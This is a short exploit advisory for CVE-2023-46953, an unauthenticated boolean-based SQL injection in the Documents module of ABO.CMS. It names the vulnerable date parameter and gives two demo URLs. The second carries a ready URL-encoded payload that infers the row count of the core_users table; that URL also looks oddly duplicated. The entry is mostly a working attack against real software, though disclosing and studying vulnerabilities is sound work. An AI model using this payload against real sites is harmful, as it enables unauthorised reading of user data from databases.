# Exploit Title: SQLi in ABO.CMS (Unauthenticated) # Date: 25.10.2023 # Exploit Author: sadfox # Vendor Homepage: https://abocms.ru # Version: All editions of ABO.CMS # Tested on: ABO.CMS 5.9.3 # CVE : CVE-2023-46953 # Status: HIGH-CRITICAL # Reference: https://portswigger.net/web-security/sql-injection Boolean-Based SQL injection in "Documents" module. The parameter d, which is responsible for transmitting the date, is vulnerable. In Demo-1, the %27 character breaks the SQL syntax, resulting in a 500 error. In Demo-2, the payload correctly terminates the SQL syntax. ### Demo-1: http://demo.target.ru/support/docs/?action=assortment&paretn=&c=test&d=14.10.2023%27 ### Demo-2: http://demo.target.ru/support/docs/?action=assortment&paretn=&c=test&d=14.10.2023/support/docs/?action=assortment&parent=&c=test&d=14.10.2023%27%20OR%20NOT%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28COUNT%28%2A%29%20AS%20NCHAR%29%2C0x20%29%20FROM%20core_users%29%2C1%2C1%29%29%3E51%20OR%20%27Fjig%27%3D%27RbUH